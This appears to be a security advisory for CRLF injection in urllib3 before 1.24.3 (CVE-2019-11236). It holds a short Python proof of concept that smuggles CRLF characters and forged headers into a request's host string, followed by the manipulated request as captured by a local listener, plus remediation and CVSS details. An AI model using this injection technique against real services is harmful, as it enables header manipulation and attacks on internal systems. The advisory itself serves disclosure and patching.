CRLF injection

Affecting urllib3 package, versions [,1.24.3)

Do your applications use this vulnerable package? Test your applications

Overview

urllib3 is an HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to CRLF injection. Attacker who has the control of the requesting address parameter, could manipulate an HTTP header and attack an internal service.

PoC

by ragdoll and Alvin Chang

import urllib3

pool_manager = urllib3.PoolManager()

host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a"

try:
    info = pool_manager.request('GET', url).info()
    print(info)
except Exception:
    pass

# nc -l localhost 7777
GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123:8080/test/?test=a HTTP/1.1
Host: localhost:7777
Accept-Encoding: identity

The nc server will display the HTTP request with a manipulated header content: X-injected:header, indicating a successful injection of the HTTP header.

Remediation

Upgrade urllib3 to version 1.24.3 or higher.

References

CVSS Score

7.3
high severity

Exploit: Mature
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    Low
  • Integrity
    Low
  • Availability
    Low
  • Exploit maturity
    High
  • Remediation Level
    Official
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:H/RL:O/RC:C
Credit
ragdoll
CVE
CVE-2019-11236
CWE
CWE-93
Snyk ID
SNYK-PYTHON-URLLIB3-174323
Disclosed
15 Apr, 2019
Published
18 Apr, 2019